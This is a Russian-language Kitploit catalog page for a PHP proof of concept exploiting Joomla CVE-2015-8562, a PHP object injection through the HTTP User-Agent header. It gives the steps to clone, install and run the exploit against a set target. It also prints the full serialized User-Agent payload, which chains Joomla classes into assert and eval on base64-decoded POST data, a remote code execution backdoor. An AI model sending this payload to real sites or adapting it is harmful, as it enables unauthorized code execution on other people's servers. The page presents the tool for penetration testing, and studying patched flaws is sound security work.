Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Доказательство концепции для уязвимости Joomla CVE-2015-8562 | Kitploit
Инструменты/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Доказательство концепции для уязвимости Joomla CVE-2015-8562

Репозиторий
2310 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Joomla-CVE-2015-8562-PHP-POC

Доказательство концепции уязвимости CVE-2015-8562 в Joomla

Preview

Введение

Этот PoC — почти точная копия реализации на Python от Gary, размещённой на exploit-db.

Использование

Установка очень проста:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

После того как composer установит всё необходимое, вам нужно изменить $target в exploit.php.

После этого вы готовы к запуску:

root@kitploit:~
php exploit.php

CVE-2015-8562

В декабре 2015 года в Joomla была обнаружена уязвимость. Она позволяет удалённым злоумышленникам проводить атаки внедрения объектов PHP и выполнять произвольный PHP-код через заголовок HTTP User-Agent.

Эта уязвимость затрагивает все версии Joomla. Патч для v1.5.x, v2.5x и v3.x уже выпущен.

Если вы используете PHP >= 5.4.45, >= 5.5.29 или >= 5.6.13, вы в безопасности, поскольку эта эксплойт также использует CVE-2015-6835.

Никос Верскор из PatrolServer написал очень подробный пост в блоге и оказал большую помощь в понимании этой уязвимости. Вы можете бесплатно использовать их мини-сканер, чтобы проверить, находится ли ваш сайт под угрозой.

Реальная эксплойтация

Вот как выглядит отправленный заголовок User-Agent:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
Скачать инструмент